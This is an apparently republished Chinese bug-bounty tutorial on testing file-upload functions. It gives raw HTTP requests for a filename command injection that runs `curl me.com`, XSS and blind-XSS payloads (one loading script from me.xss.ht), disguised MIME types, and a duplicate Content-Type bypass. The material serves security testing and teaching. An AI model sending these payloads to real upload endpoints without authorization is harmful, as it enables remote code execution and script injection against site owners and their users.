赏金猎人系列-如何测试文件上传功能-II
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
前言
接前文: 赏金猎人系列-如何测试文件上传功能
本文继续讲解如何测试文件上传功能
正文
第八种情况
尝试在文件名这里注入命令curl me.com,看可否有RCE
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: Number
Content-Disposition: form-data; name="file"; filename="filename"
`curl me.com`
---------------------------------------WebKitFormBoundary--
第九种情况
文件名改为 file.''gif,
content改为类似: <html><script> alert('XSS ');</script></html>
Content Type 改为 image/png
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: Number
Content-Disposition: form-data; name="file"; filename="file.''gif"
Content-Type: image/png
GIF8
<html><script>alert('XSS');</script></html>
------WebKitFormBoundary--
第十种情况
文件名插入大量的字符或者数字
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: Number
Content-Disposition: form-data; name="file"; filename="xxxxx+.png"
Content-Type: image/png
------WebKitFormBoundary--
第十一种情况
content改为blind xss的payload:<html><head>><script src=https://me.xss.ht></script></head><body></body></html>
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: Number
Content-Disposition: form-data; name="file"; filename="file.html"
Content-Type: image/png
<html><head>><script src=https://me.xss.ht>
</script></head><body></body></html>
------WebKitFormBoundary--
第十二种情况
content改为 xss的payload: <html><body><head> <html><script>alert('XSS');</script></html></head></body></html>
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: Number
Content-Disposition: form-data; name="file"; filename="file.html"
Content-Type: text/html
<html><body><head><script>
alert('XSS');</script></html></head></body></html>
------WebKitFormBoundary--
第十三种情况
针对 Unallowed Type 和 Allowed Type分别设置两次和一次的Content-Type
下面举个Unallowed Type的例子:
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: Number
Content-Disposition: form-data; name="file"; filename="file.png"
Content-Type: text/html
Content-Type: image/png
<html><body><head><script>
alert('XSS');</script></html></head></body></html>
------WebKitFormBoundary--
参考
https://infosecwriteups.com/command-injection-poc-72cc3743f10d
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://anotherhackerblog.com/exploiting-file-uploads-pt-2/
https://websecblog.com/vulns/googleplex-com-blind-xss/
Testing an upload functionality? Sometimes, an encoded # (%23) will help you to bypass file type restrictions. Thanks for the #BugBountyTip, @seifelsallamy! #BugBountyTips pic.twitter.com/BrlMSceWAn
— INTIGRITI (@intigriti) March 15, 2021
原文始发于微信公众号(迪哥讲事):赏金猎人系列-如何测试文件上传功能-II
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论